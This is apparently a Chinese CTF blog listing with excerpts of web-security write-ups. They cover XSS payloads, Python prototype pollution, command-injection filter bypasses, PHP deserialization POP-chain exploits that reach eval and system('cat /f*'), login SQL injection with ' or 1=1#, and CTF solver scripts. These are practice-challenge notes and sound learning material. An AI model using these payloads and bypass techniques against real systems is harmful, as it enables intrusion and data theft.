关于xss在src的补充
关于xss在src的补充 写在前面 好久没有再接触过xss,最近系统性地重新学了一遍,现在再做一些补充 分类和识别 能直接出回显的是反射型xss 能直接写入,刷新还在的是存储型xss :常见于评论 XSS常用payload xss: <script>alert(123);</script> <a href="">xxx</ a> dom xss:视情况而定
Posts
python原型链污染
遇到一道原型链污染的题目学习一下 原题(basectf2024) 请解释J1ngHong说:你想read flag吗? 那么圣钥之光必将阻止你! 但是小小的源码没事,因为你也读不到flag(乐) from flask import Flask,request import json app = Flask(__name__) def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) def is_json(data): try: json.loads(data) return True except ValueError: return False class cls(): def __init__(self): pass instance = cls() @app.route('/', methods=['GET', 'POST']) def hello_world(): return open('/static/index.html', encoding="utf-8").read() @app.route('/read', methods=['GET', 'POST']) def Read(): file = open(__file__, encoding="utf-8").read() return f"J1ngHong说:你想read flag吗? 那么圣钥之光必将阻止你! 但是小小的源码没事,因为你也读不到flag(乐) {file} " @app.route('/pollute', methods=['GET', 'POST']) def Pollution(): if request.is_json: merge(json.loads(request.data),instance) else: return "J1ngHong说:钥匙圣洁无暇,无人可以污染!" return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?" if __name__ == '__main__': app.run(host='0.0.0.0',port=80) 原型链污染分析 class father: secret = "hello" class son_a(father): pass class son_b(father): pass def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) instance = son_b() payload = { "__class__" : { "__base__" : { "secret" : "world" } } } print(son_a.secret) #hello print(instance.secret) #hello merge(payload, instance) print(son_a.secret) #world print(instance.secret) #world 最终payload GET /pollute HTTP/1.1 Host: challenge.basectf.fun:39759 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Priority: u=0, i Content-Type: application/json Content-Length: 108 { "__init__":{ "__globals__":{ "__file__":"flag" } } } 贴个链接 ...
biji
笔记 杂笔记 在逆向(星号)((BYTE*)的时候用宏定义#define BYTE unsigned char即可正常使用 system(“tac flag.php”)用来读取文件内容; ?c=system(“tac%20fla(星号)")意思是c=system(“tac flag”); 在linux的shell里: ls /(查看所有目录) ls /home(进入home文件夹) cat /home/flag.txt(打开flag.txt) tac用法同上 ls ../输出上一级目录的内容 命令绕过 黑洞绕过:system($c.” >/dev/null 2>&1"); 它只会让分号后面的指令进入黑洞,所以这里直接绕过 双写分号绕过?c=tac f*;ls 双写&&绕过?c=tac f*%26%26ls(注:星号被绕过可以用问号)([0-9]和%的过滤是不会过滤%26之类的)() 带行号绕过?c=nl<fla’‘g.php%7C%7Cls(此方法可能要右键看源代码) 有$的情况下可以重命名flag.php成txt再直接访问:先执行?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls 然后使用ls||ls看看有没有命名成功。成功后直接访问a.txt ...
一些php特性
一些php特性 关于"." 当 php 版本⼩于 8 时,GET 请求的参数名含有 . ,会被转为 _ ,但是如果参数名中有 [ ,这 个 [ 会被直接转为 _ ,但是后⾯如果有 . ,这个 . 就不会被转为 _ 。 有如 Jail_by.Happy 等同于 ?Jail[by.Happy=xxxxxx 并有: highlight_file(glob("/f*")[0]); 这段代码的作用是用 PHP 读取并高亮显示一个文件的内容。下面是对各部分的详细解释: glob("/f*"):glob 函数用于根据模式匹配文件路径。模式 /f* 表示匹配所有以 f 开头的文件或目录。在这个上下文中,它会列出路径为 / 目录下所有以 f 开头的文件或目录。 glob("/f*")[0]:glob 函数返回一个文件路径数组。[0] 是用来访问第一个匹配的文件路径。如果存在多个匹配项,这里只取第一个。 highlight_file():highlight_file 函数用于显示一个文件的内容,并对其进行语法高亮。默认情况下,highlight_file 只输出文件内容,不能作为字符串返回。它是直接在浏览器中输出文件内容的 HTML 代码。
mathma
basectf数学大师脚本 脚本: import requests from bs4 import BeautifulSoup import re from requests.cookies import RequestsCookieJar result = 1 session_cookie = 1 for i in range(50): url = "http://challenge.basectf.fun:35901/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Cookie": 'PHPSESSID='+f"{session_cookie}", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" } data = { "answer": f"{result}", } response = requests.post(url, headers=headers, data=data) print(response.text) match = re.search(r'me in 3 second (.+?)\?', response.text) if match: expression = match.group(1) expression = expression.replace('×', '*').replace('÷', '/') result = eval(expression) result = round(float(result)) print(result) cookies_text = str(response.cookies) print(cookies_text) # 示例 CookiesJar match = re.search(r'PHPSESSID=([a-zA-Z0-9]+)', cookies_text) if match: phpsessid_value = match.group(1) print(phpsessid_value) # 输出: r6vfuu1vs0ij7sf6saa8576lk8 session_cookie = phpsessid_value
反序列化中私有属性无法访问的解决办法
反序列化中私有属性无法访问的解决办法 前情提要 今天做了一下basectf 的反序列化,遇到了一个php语言版本较低,导致无法解析私有属性的访问的题目。 原题 <?php highlight_file(__FILE__); class Sink { private $cmd = 'echo 123;'; public function __toString() { eval($this->cmd); } } class Shark { private $word = 'Hello, World!'; public function __invoke() { echo 'Shark says:' . $this->word; } } class Sea { public $animal; public function __get($name) { $sea_ani = $this->animal; echo 'In a deep deep sea, there is a ' . $sea_ani(); } } class Nature { public $sea; public function __destruct() { echo $this->sea->see; } } if ($_POST['nature']) { $nature = unserialize($_POST['nature']); } EXP <?php class Sink { private $cmd = 'system("cat /f*");'; } class Shark { private $word; public function __construct() { $this->word=new Sink(); } } class Sea { public $animal; } class Nature { public $sea; } $x=new Sink; $y=new Shark; $z=new Sea; $a=new Nature; $a->sea=$z; $z->animal=$y; echo urlencode(serialize($a)); ?> 办法 遇到私有属性的时候可以直接在exp中利用__construct()进行访问 ...
moectf铜人阵脚本
moectf铜人阵脚本 import requests from bs4 import BeautifulSoup import re from requests.cookies import RequestsCookieJar url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" } data = { "player": "77", "direct": "弟子明白" } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) # 从响应头中提取 Cookies #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个,{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case in test_cases: print(f"{get_direction_description(case)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个,{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个,{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个,{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text) #cookies_text = response.cookies cookies_text = str(response.cookies) match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text) if match: session_cookie = match.group(1) print(f"{session_cookie}") else: print("Session cookie not found") print(f"{session_cookie}") print(status_text) def get_direction_description(directions): # 定义方位字典 direction_map = { 1: "北方", 2: "东北方", 3: "东方", 4: "东南方", 5: "南方", 6: "西南方", 7: "西方", 8: "西北方" } # 去掉输入数据中的多余空白字符 directions = directions.strip() try: # 处理单个数字的情况 if ',' not in directions: direction = int(directions) return direction_map.get(direction, "无效输入") # 处理两个数字的情况 direction_list = [int(d.strip()) for d in directions.split(',')] if len(direction_list) == 2: desc1 = direction_map.get(direction_list[0], "无效输入") desc2 = direction_map.get(direction_list[1], "无效输入") if desc1 == "无效输入" or desc2 == "无效输入": return "无效输入" return f"{desc1}一个,{desc2}一个" else: return "无效输入" except ValueError: return "无效输入" # 测试代码 test_cases = [status_text] for case2 in test_cases: print(f"{get_direction_description(case2)}") url = "http://127.0.0.1:49885/" headers = { "Cache-Control": "max-age=0", "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "Upgrade-Insecure-Requests": "1", "Origin": "http://127.0.0.1:63738", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Referer": "http://127.0.0.1:63738/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Cookie": 'session='+f"{session_cookie}", "Connection": "close" } data = { "player": "77", "direct": get_direction_description(case2) } response = requests.post(url, headers=headers, data=data) #print(response.status_code) #print(response.text) soup = BeautifulSoup(response.text, 'html.parser') status_element = soup.find('h1', id='status') status_text = status_element.get_text(strip=True) print(status_text)
有关登录型sql注入的补充
有关登录型sql注入的补充 登录型sql注入特征 形如下列语句即为登录型 $sql = "SELECT * FROM admin WHERE email='$email' AND pwd='$pwd'"; 注入方法以及原理 万能密码: ' or 1=1# 在用户名输入框中输入:’ or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为: select * from users where username='' or 1=1#' and password=md5('') 语义分析:“#”在mysql中是注释符,这样井号后面的内容将被mysql视为注释内容,这样就不会去执行了,换句话说,以下的两句sql语句等价: select * from users where username='' or 1=1#' and password=md5('') 等价于 select * from users where username='' or 1=1 SQL注入采用的’ OR 1=1 # 是什么意思呢? ...
php挺有趣的题目
挺有趣的题目 先说一下is_numeric()的绕过 is_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE,否则返回 FALSE,且php中弱类型比较时,会使(‘1234a’ == 1234)为真,或者'12345%00’ 题目 <?php highlight_file('final1l1l_challenge.php'); error_reporting(0); include 'flag.php'; $a = $_GET['a']; $b = $_POST['b']; if (isset($a) && isset($b)) { if (!is_numeric($a) && !is_numeric($b)) { if ($a == 0 && md5($a) == $b[$a]) { echo $flag; } else { die('noooooooooooo'); } } else { die( 'Notice the param type!'); } } else { die( 'Where is your param?'); } 这里我们需要知道一个要点 ...
moectf-pop
moectf-pop 将近半年没有接触反序列化,上手竟觉得如此生疏,贴一下原题和poc 原题 <?php class class000 { ni public function __destruct() { $this->check(); } public function check() { if($this->payl0ad === 0) { die('FAILED TO ATTACK'); } $a = $this->what; $a(); } } class class001 { public $payl0ad; public $a; public function __invoke() { $this->a->payload = $this->payl0ad; } } class class002 { private $sec; public function __set($a, $b) { $this->$b($this->sec); } public function dangerous($whaattt) { $whaattt->evvval($this->sec); } } class class003 { public $mystr; public function evvval($str) { eval($str); } public function __tostring() { return $this->mystr; } } if(isset($_GET['data'])) { $a = unserialize($_GET['data']); } else { highlight_file(__FILE__); } Poc <?php class class000 { private $payl0ad=1; public $what='class001'; } class class001 { public $payl0ad='echo'; public $a; } class class002 { public $sec; } class class003 { public $mystr; } $x=new class000; $y=new class001; $z=new class002; $p=new class003; $x->what = $y; $y->a=$z; $y->payl0ad='dangerous'; $z->sec=$p; $p->mystr='phpinfo();'; echo urlencode(serialize($x)); ?> 这里特别注意一下因为eval函数执行的是php命令,记得带上";" ...